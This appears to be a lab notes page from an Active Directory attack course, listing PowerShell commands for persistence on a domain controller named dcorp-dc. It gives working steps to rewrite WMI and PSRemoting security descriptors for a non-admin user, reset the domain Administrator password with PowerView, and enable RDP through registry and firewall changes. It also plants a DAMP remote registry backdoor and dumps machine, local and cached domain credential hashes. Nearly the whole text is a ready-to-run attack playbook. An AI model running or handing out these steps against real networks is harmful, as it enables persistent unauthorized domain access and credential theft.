Persistence ACLs - Security Descriptors

  • Need DA

Security Descriptors

#Need DA
Import-Module Set-RemoteWMI
Import-Module Set-RemotePSRemoting.ps1

#On Local Machine for Student529 or your current user
Set-RemoteWMI -UserName student529 -Verbose


#On Remote Machine without Credentials
Set-RemoteWMI -UserName student529 -Verbose -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose
Set-RemotePSRemoting -UserName student529 -Verbose -ComputerName dcorp-dc -Verbose


#On Remote Machine without Credentials
Set-RemoteWMI -UserName student529 -Verbose -ComputerName dcorp-dc -Credential Administrator -namespace 'root\cimv2' -Verbose
Set-RemotePSRemoting -UserName student529 -Verbose -ComputerName dcorp-dc -Credential Administrator

#On Remote Machine remove permissions
Set-RemoteWMI -UserName student529 -ComputerName dcorp-dc–namespace 'root\cimv2' -Remove -Verbose


#verify that we have access and can execute command with WMI
#Open Powershell with student529 non-admin user
Get-Wmiobject -Class Win32_operatingsystem -Computername dcorp-dc 


----------Abuse WMI-----
#If we excuted Set-RemotePSRemoting.ps1, we can now use invoke-command:
#Open Powershell with student529 non-admin user
Invoke-command -ScriptBlock{whoami /priv} -ComputerName dcorp-dc

Import-Module .\PowerView_dev.ps1
Set-DomainUserPassword -Identity Administrator -AccountPassword (ConvertTo-SecureString "Password@1234" -AsPlainText -Force) -Verbose


#Enter Session with new password
Enter-PSSession –Computername dcorp-dc –credential dcorp\Administrator


----------#Extra-------
#Enable Remote Desktop
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
#Activate the firewall rule
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
#Enable authentication via RDP
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1

Security Descriptors - Remote Registry

#Need DA
Import-Module C:\AD\Tools\DAMP-master\DAMP-master\Add-RemoteRegBackdoor.ps1



#Using DAMP, with admin privs on remote machine
Add-RemoteRegBackdoor -ComputerName dcorp-dc -Trustee student529 -Verbose


#As student529, retrieve machine account hash:
#Open Powershell with student529 non-admin user
#if we get an error, open RemoteHashRetrieval.ps1 and 
#replace $IV with $initV, save RemoteHashRetrieval.ps1 and run it again
Import-Module C:\AD\Tools\DAMP-master\DAMP-master\RemoteHashRetrieval.ps1
Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose


#Retrieve local account hash:
Get-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose


#Retrieve domain cached credentials:
Get-RemoteCachedCredential -ComputerName dcorp-dc -Verbose

Last updated

Was this helpful?